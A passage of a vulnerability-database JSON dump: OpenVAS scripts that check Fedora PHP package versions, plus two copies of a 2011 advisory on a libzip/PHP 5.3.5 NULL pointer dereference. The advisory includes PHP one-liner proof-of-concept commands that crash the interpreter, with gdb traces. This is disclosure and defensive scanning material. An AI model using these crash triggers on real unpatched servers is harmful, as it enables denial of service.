Accelerator & Encoder.\n It increases performance of PHP scripts by caching them in compiled state, so\n that the overhead of compiling is almost completely eliminated.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057707.html\");\n script_id(862969);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-11 15:05:25 +0200 (Mon, 11 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-3636\");\n script_cve_id(\"CVE-2011-1153\", \"CVE-2011-1092\", \"CVE-2011-0708\", \"CVE-2011-0421\");\n script_name(\"Fedora Update for php-eaccelerator FEDORA-2011-3636\");\n\n script_summary(\"Check for the Version of php-eaccelerator\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.6.1~6.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1092", "CVE-2011-0708"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-04-11T00:00:00", "id": "OPENVAS:1361412562310862972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862972", "type": "openvas", "title": "Fedora Update for maniadrive FEDORA-2011-3666", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for maniadrive FEDORA-2011-3666\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057711.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862972\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-11 15:05:25 +0200 (Mon, 11 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-3666\");\n script_cve_id(\"CVE-2011-1153\", \"CVE-2011-1092\", \"CVE-2011-0708\", \"CVE-2011-0421\");\n script_name(\"Fedora Update for maniadrive FEDORA-2011-3666\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'maniadrive'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"maniadrive on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"maniadrive\", rpm:\"maniadrive~1.2~27.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:55:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1092", "CVE-2011-0708"], "description": "Check for the Version of php-eaccelerator", "modified": "2017-07-10T00:00:00", "published": "2011-04-11T00:00:00", "id": "OPENVAS:862973", "href": "http://plugins.openvas.org/nasl.php?oid=862973", "type": "openvas", "title": "Fedora Update for php-eaccelerator FEDORA-2011-3666", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php-eaccelerator FEDORA-2011-3666\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"php-eaccelerator on Fedora 13\";\ntag_insight = \"eAccelerator is a further development of the MMCache PHP Accelerator & Encoder.\n It increases performance of PHP scripts by caching them in compiled state, so\n that the overhead of compiling is almost completely eliminated.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057710.html\");\n script_id(862973);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-11 15:05:25 +0200 (Mon, 11 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-3666\");\n script_cve_id(\"CVE-2011-1153\", \"CVE-2011-1092\", \"CVE-2011-0708\", \"CVE-2011-0421\");\n script_name(\"Fedora Update for php-eaccelerator FEDORA-2011-3666\");\n\n script_summary(\"Check for the Version of php-eaccelerator\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.6.1~6.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1092", "CVE-2011-0708"], "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2011-04-11T00:00:00", "id": "OPENVAS:862975", "href": "http://plugins.openvas.org/nasl.php?oid=862975", "type": "openvas", "title": "Fedora Update for php FEDORA-2011-3636", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2011-3636\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated web pages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on Fedora 14\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057708.html\");\n script_id(862975);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-11 15:05:25 +0200 (Mon, 11 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-3636\");\n script_cve_id(\"CVE-2011-1153\", \"CVE-2011-1092\", \"CVE-2011-0708\", \"CVE-2011-0421\");\n script_name(\"Fedora Update for php FEDORA-2011-3636\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.6~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:40", "description": "\nPHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference", "edition": 1, "published": "2011-03-18T00:00:00", "title": "PHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0421"], "modified": "2011-03-18T00:00:00", "id": "EXPLOITPACK:2DC667606D7AA02656ADD5D51EDFFA58", "href": "", "sourceData": "Source: http://securityreason.com/securityalert/8146\n\nlibzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)\n\nAuthor: Maksymilian Arciemowicz\nhttp://securityreason.com/\nhttp://cxib.net/\nDate:\n- Dis.: 03.01.2011\n- Pub.: 18.03.2011\n\nCVE: CVE-2011-0421\nCERT: VU#325039\n\nAffected Software:\n- libzip 0.9.3\n- PHP 5.3.5 (fixed 5.3.6)\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/96\n\n\n--- 0.Description ---\nlibzip is a C library for reading, creating, and modifying zip archives.\nFiles can be added from data buffers, files, or compressed data copied\ndirectly from other zip archives. Changes made without closing the archive\ncan be reverted. The API is documented by man pages.\n\n\n--- 1.Description ---\nlibzip allows remote and local attackers to Denial of Service (Null Pointer\nDereference) if ZIP_FL_UNCHANGED flag is set.\n\n-lib/zip_name_locate.c---\nint\n_zip_name_locate(struct zip *za, const char *fname, int flags,\nstruct zip_error *error)\n{\nint (*cmp)(const char *, const char *);\nconst char *fn, *p;\nint i, n;\n\nif (fname == NULL) {\n_zip_error_set(error, ZIP_ER_INVAL, 0);\nreturn -1;\n}\n\ncmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;\n\nn = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=\nCRASH HERE\n-lib/zip_name_locate.c---\n\nfor empty zip file and ZIP_FL_UNCHANGED flag, libzip should crash.\nCurrently for PHP, the security impact we estimate only like a remote DoS,\nso risk is low. \n\nProject using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame,\nfuse-zip, php zip extension, Endeavour2, FreeDink\n\nBetter analysis based on PHP code ZipArchive, bellow\n\n\n--- 2. PHP 5.3.5 ZipArchive() ---\nPoC1:\nphp -r '$nx=new\nZipArchive();$nx->open(\"/dev/null\");$nx->locateName(\"a\",ZIPARCHIVE::FL_UNCH\nANGED);'\n\nPoC2:\nphp -r '$nx=new\nZipArchive();$nx->open(\"empty.zip\");$nx->statName(\"a\",ZIPARCHIVE::FL_UNCHAN\nGED);'\n\nLet's\n-php_zip.c-------------------------------------\n...\nstatic ZIPARCHIVE_METHOD(locateName)\n{\n...\nZIP_FROM_OBJECT(intern, this);\n\nif (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, \"s|l\",\n&name, &name_len, &flags) == FAILURE) {\nreturn;\n}\n...\nidx = (long)zip_name_locate(intern, (const char *)name, flags); <=== CRASH\nIN THIS FUNCTION\n...\n-php_zip.c-------------------------------------\n\nand let`s see\n\n-zip_name_locate.c-------------------------------------\nZIP_EXTERN(int)\nzip_name_locate(struct zip *za, const char *fname, int flags)\n{\nreturn _zip_name_locate(za, fname, flags, &za->error);\n}\n\n\nint\n_zip_name_locate(struct zip *za, const char *fname, int flags,\nstruct zip_error *error)\n{\nint (*cmp)(const char *, const char *);\nconst char *fn, *p;\nint i, n;\n\nif (fname == NULL) {\n_zip_error_set(error, ZIP_ER_INVAL, 0);\nreturn -1;\n}\n\ncmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp;\n\nn = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <===\nCRASH HERE IF ZIPARCHIVE::FL_UNCHANGED\nfor (i=0; i<n; i++) {\n...\n-zip_name_locate.c-------------------------------------\n\n(gdb) bt\n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70\n\"a\", flags=32767, \nerror=0xffffffff00000000) at\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\n#1 0x00000000006381e6 in c_ziparchive_locateName (ht=2,\nreturn_value=0x1169418, return_value_ptr=0xffffffff, \nthis_ptr=0x118d530, return_value_used=-176126592) at\n/build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877\n#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC\n(execute_data=0x7ffff7eb7068)\nat /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316\n#3 0x00000000006c0b00 in execute (op_array=0x1168568) at\n/build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107\n...\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400\n\"9223372036854775808\", flags=32767, \nerror=0xffffffff00000000) at\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\n65 n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry :\nza->nentry;\n(gdb) print za->cdir->nentry\nCannot access memory at address 0x8\n(gdb) print za->nentry\n$21 = 0\n\nbecause \n\n(gdb) x/i $rip\n=> 0x6407cc <_zip_name_locate+236>: mov 0x8(%rax),%eax\n(gdb) x/i $rax\n0x0: Cannot access memory at address 0x0\n(gdb) x/i $eax\n\ncall to zip_name_locate\n\n(gdb) n\n1877 idx = (long)zip_name_locate(intern, (const char *)name,\nflags);\n(gdb) print intern\n$24 = (struct zip *) 0x118d580\n(gdb) x/x intern\n0x118d580: 0x0118d220\n(gdb) x/40x intern\n0x118d580: 0x0118d220 0x00000000 0x0118d340 0x00000000\n0x118d590: 0x00000000 0x00000000 0x00000000 0x00000000\n0x118d5a0: 0x00000000 0x00000000 0x00000000 0x00000000\n0x118d5b0: 0x00000000 0x00000000 0xffffffff 0x00000000\n0x118d5c0: 0x00000000 0x00000000 0x00000000 0x00000000\n0x118d5d0: 0x00000000 0x00000000 0x00000000 0x00000000\n0x118d5e0: 0x00000000 0x00000000 0x00020a21 0x00000000\n0x118d5f0: 0x00000000 0x00000000 0x00000000 0x00000000\n0x118d600: 0x00000000 0x00000000 0x00000000 0x00000000\n0x118d610: 0x00000000 0x00000000 0x00000000 0x00000000\n\n\nnext PoC2\n\n$nx=new\nZipArchive();$nx->open(\"empty.zip\");$nx->statName(\"9223372036854775808\",\"92\n23372036854775807\");\nrogram received signal SIGSEGV, Segmentation fault.\n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0\n\"9223372036854775808\", flags=32767, \nerror=0xffffffffffffdac0) at\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\n65 in /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c\n(gdb) bt\n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0\n\"9223372036854775808\", flags=32767, \nerror=0xffffffffffffdac0) at\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65\n#1 0x0000000000640a50 in zip_stat (za=0x118d520, fname=0x11693f0\n\"9223372036854775808\", flags=-1, \nst=0x7fffffffda70) at\n/build/buildd/php5-5.3.3/ext/zip/lib/zip_stat.c:45\n#2 0x0000000000638451 in c_ziparchive_statName (ht=2,\nreturn_value=0x1169480, return_value_ptr=0xffffffff, \nthis_ptr=0x118d530, return_value_used=-176126592) at\n/build/buildd/php5-5.3.3/ext/zip/php_zip.c:1818\n#3 0x00000000006e986a in zend_do_fcall_common_helper_SPEC\n(execute_data=0x7ffff7eb7068)\nat /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316\n\n\n--- 3. Fix ---\nThis issue has been fixed with PHP Team, so big thanks guys.\n\nhttp://www.php.net/ChangeLog-5.php#5.3.6\n\nhttp://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_name\n_locate.c?annotate=307867\n\n\n--- 4. Greets ---\nSpecial thanks for Pierre Joye and Stas\n\nsp3x, Infospec,\n\n\n--- 5. Contact ---\nAuthor: Maksymilian Arciemowicz\n\nEmail:\n- cxib {a\\./t] securityreason [d=t} com\n\nGPG:\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n\nhttp://securityreason.com/\nhttp://cxib.net/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:56", "description": "", "published": "2011-03-18T00:00:00", "type": "packetstorm", "title": "libzip 0.9.3 NULL Pointer Dereference", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0421"], "modified": "2011-03-18T00:00:00", "id": "PACKETSTORM:99445", "href": "https://packetstormsecurity.com/files/99445/libzip-0.9.3-NULL-Pointer-Dereference.html", "sourceData": "` \nlibzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5) \n \nAuthor: Maksymilian Arciemowicz \nhttp://securityreason.com/ \nhttp://cxib.net/ \nDate: \n- Dis.: 03.01.2011 \n- Pub.: 18.03.2011 \n \nCVE: CVE-2011-0421 \nCERT: VU#325039 \n \nAffected Software: \n- libzip 0.9.3 \n- PHP 5.3.5 (fixed 5.3.6) \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/96 \n \n \n--- 0.Description --- \nlibzip is a C library for reading, creating, and modifying zip archives. \nFiles can be added from data buffers, files, or compressed data copied \ndirectly from other zip archives. Changes made without closing the archive \ncan be reverted. The API is documented by man pages. \n \n \n--- 1.Description --- \nlibzip allows remote and local attackers to Denial of Service (Null Pointer \nDereference) if ZIP_FL_UNCHANGED flag is set. \n \n-lib/zip_name_locate.c--- \nint \n_zip_name_locate(struct zip *za, const char *fname, int flags, \nstruct zip_error *error) \n{ \nint (*cmp)(const char *, const char *); \nconst char *fn, *p; \nint i, n; \n \nif (fname == NULL) { \n_zip_error_set(error, ZIP_ER_INVAL, 0); \nreturn -1; \n} \n \ncmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp; \n \nn = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <= \nCRASH HERE \n-lib/zip_name_locate.c--- \n \nfor empty zip file and ZIP_FL_UNCHANGED flag, libzip should crash. \nCurrently for PHP, the security impact we estimate only like a remote DoS, \nso risk is low. \n \nProject using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame, \nfuse-zip, php zip extension, Endeavour2, FreeDink \n \nBetter analysis based on PHP code ZipArchive, bellow \n \n \n--- 2. PHP 5.3.5 ZipArchive() --- \nPoC1: \nphp -r '$nx=new \nZipArchive();$nx->open(\"/dev/null\");$nx->locateName(\"a\",ZIPARCHIVE::FL_UNCH \nANGED);' \n \nPoC2: \nphp -r '$nx=new \nZipArchive();$nx->open(\"empty.zip\");$nx->statName(\"a\",ZIPARCHIVE::FL_UNCHAN \nGED);' \n \nLet's \n-php_zip.c------------------------------------- \n... \nstatic ZIPARCHIVE_METHOD(locateName) \n{ \n... \nZIP_FROM_OBJECT(intern, this); \n \nif (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, \"s|l\", \n&name, &name_len, &flags) == FAILURE) { \nreturn; \n} \n... \nidx = (long)zip_name_locate(intern, (const char *)name, flags); <=== CRASH \nIN THIS FUNCTION \n... \n-php_zip.c------------------------------------- \n \nand let`s see \n \n-zip_name_locate.c------------------------------------- \nZIP_EXTERN(int) \nzip_name_locate(struct zip *za, const char *fname, int flags) \n{ \nreturn _zip_name_locate(za, fname, flags, &za->error); \n} \n \n \nint \n_zip_name_locate(struct zip *za, const char *fname, int flags, \nstruct zip_error *error) \n{ \nint (*cmp)(const char *, const char *); \nconst char *fn, *p; \nint i, n; \n \nif (fname == NULL) { \n_zip_error_set(error, ZIP_ER_INVAL, 0); \nreturn -1; \n} \n \ncmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp; \n \nn = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=== \nCRASH HERE IF ZIPARCHIVE::FL_UNCHANGED \nfor (i=0; i<n; i++) { \n... \n-zip_name_locate.c------------------------------------- \n \n(gdb) bt \n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70 \n\"a\", flags=32767, \nerror=0xffffffff00000000) at \n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65 \n#1 0x00000000006381e6 in c_ziparchive_locateName (ht=2, \nreturn_value=0x1169418, return_value_ptr=0xffffffff, \nthis_ptr=0x118d530, return_value_used=-176126592) at \n/build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877 \n#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC \n(execute_data=0x7ffff7eb7068) \nat /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316 \n#3 0x00000000006c0b00 in execute (op_array=0x1168568) at \n/build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107 \n... \n \nProgram received signal SIGSEGV, Segmentation fault. \n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400 \n\"9223372036854775808\", flags=32767, \nerror=0xffffffff00000000) at \n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65 \n65 n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : \nza->nentry; \n(gdb) print za->cdir->nentry \nCannot access memory at address 0x8 \n(gdb) print za->nentry \n$21 = 0 \n \nbecause \n \n(gdb) x/i $rip \n=> 0x6407cc <_zip_name_locate+236>: mov 0x8(%rax),%eax \n(gdb) x/i $rax \n0x0: Cannot access memory at address 0x0 \n(gdb) x/i $eax \n \ncall to zip_name_locate \n \n(gdb) n \n1877 idx = (long)zip_name_locate(intern, (const char *)name, \nflags); \n(gdb) print intern \n$24 = (struct zip *) 0x118d580 \n(gdb) x/x intern \n0x118d580: 0x0118d220 \n(gdb) x/40x intern \n0x118d580: 0x0118d220 0x00000000 0x0118d340 0x00000000 \n0x118d590: 0x00000000 0x00000000 0x00000000 0x00000000 \n0x118d5a0: 0x00000000 0x00000000 0x00000000 0x00000000 \n0x118d5b0: 0x00000000 0x00000000 0xffffffff 0x00000000 \n0x118d5c0: 0x00000000 0x00000000 0x00000000 0x00000000 \n0x118d5d0: 0x00000000 0x00000000 0x00000000 0x00000000 \n0x118d5e0: 0x00000000 0x00000000 0x00020a21 0x00000000 \n0x118d5f0: 0x00000000 0x00000000 0x00000000 0x00000000 \n0x118d600: 0x00000000 0x00000000 0x00000000 0x00000000 \n0x118d610: 0x00000000 0x00000000 0x00000000 0x00000000 \n \n \nnext PoC2 \n \n$nx=new \nZipArchive();$nx->open(\"empty.zip\");$nx->statName(\"9223372036854775808\",\"92 \n23372036854775807\"); \nrogram received signal SIGSEGV, Segmentation fault. \n0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0 \n\"9223372036854775808\", flags=32767, \nerror=0xffffffffffffdac0) at \n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65 \n65 in /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c \n(gdb) bt \n#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0 \n\"9223372036854775808\", flags=32767, \nerror=0xffffffffffffdac0) at \n/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65 \n#1 0x0000000000640a50 in zip_stat (za=0x118d520, fname=0x11693f0 \n\"9223372036854775808\", flags=-1, \nst=0x7fffffffda70) at \n/build/buildd/php5-5.3.3/ext/zip/lib/zip_stat.c:45 \n#2 0x0000000000638451 in c_ziparchive_statName (ht=2, \nreturn_value=0x1169480, return_value_ptr=0xffffffff, \nthis_ptr=0x118d530, return_value_used=-176126592) at \n/build/buildd/php5-5.3.3/ext/zip/php_zip.c:1818 \n#3 0x00000000006e986a in zend_do_fcall_common_helper_SPEC \n(execute_data=0x7ffff7eb7068) \nat /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316 \n \n \n--- 3. Fix --- \nThis issue has been fixed with PHP Team, so big thanks guys. \n \nhttp://www.php.net/ChangeLog-5.php#5.3.6 \n \nhttp://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_name \n_locate.c?annotate=307867 \n \n \n--- 4. Greets --- \nSpecial thanks for Pierre Joye and Stas \n \nsp3x, Infospec, \n \n \n--- 5. Contact --- \nAuthor: Maksymilian Arciemowicz \n \nEmail: \n- cxib {a\\./t] securityreason [d=t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n \nhttp://securityreason.com/ \nhttp://cxib.net/ \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99445/libzip-nullpointer.txt"}], "exploitdb": [{"lastseen": "2016-02-02T07:00:27", "description": "libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5). CVE-2011-0421. Dos exploit for linux platform", "published": 